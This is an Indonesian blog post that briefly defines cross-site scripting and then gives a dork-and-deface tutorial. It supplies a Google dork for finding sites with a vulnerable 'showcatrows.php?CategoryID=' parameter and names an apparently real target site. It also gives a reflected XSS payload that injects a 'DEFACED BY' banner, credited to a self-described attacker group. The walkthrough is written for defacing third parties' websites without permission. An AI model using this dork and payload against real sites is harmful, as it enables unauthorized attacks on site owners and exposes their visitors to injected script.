Kamis, 05 Oktober 2017
Pengertian XSS
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.
Dork XSS
Dork XSS yang masih work sampai saat ini.inurl:"/showcatrows.php?CategoryID="
Langkah Deface dengan XSS
1. Pertama Copy Dork yang telah gw sediain, paste and search di browser tercinta anda :D, kemudian akan ada banyak targe tuh yang sesuai dengan Dorknya, pilih salah satu target dan buka di tab baru :D
2. Ok ini contoh web target saya dengan URL seperti dibawah ini.
http://www.paypalshop.org/showcatrows.php?CategoryID=5
3. Kemudian tambahkan script dibawah ini diURL paling belakang.
"><marquee><h1>DEFACED BY Mrskreepkiller</h1></marquee>
Contoh
http://www.paypalshop.org/showcatrows.php?CategoryID=5"><marquee><h1>DEFACED BY Mrskreepkiller</h1></marquee>
Warna Hitam adalah URL asli dan warna Merah adalah Script XSS kita :D
thanks:Attacker Alone Cyber
Mrskreepkiller A.A.C
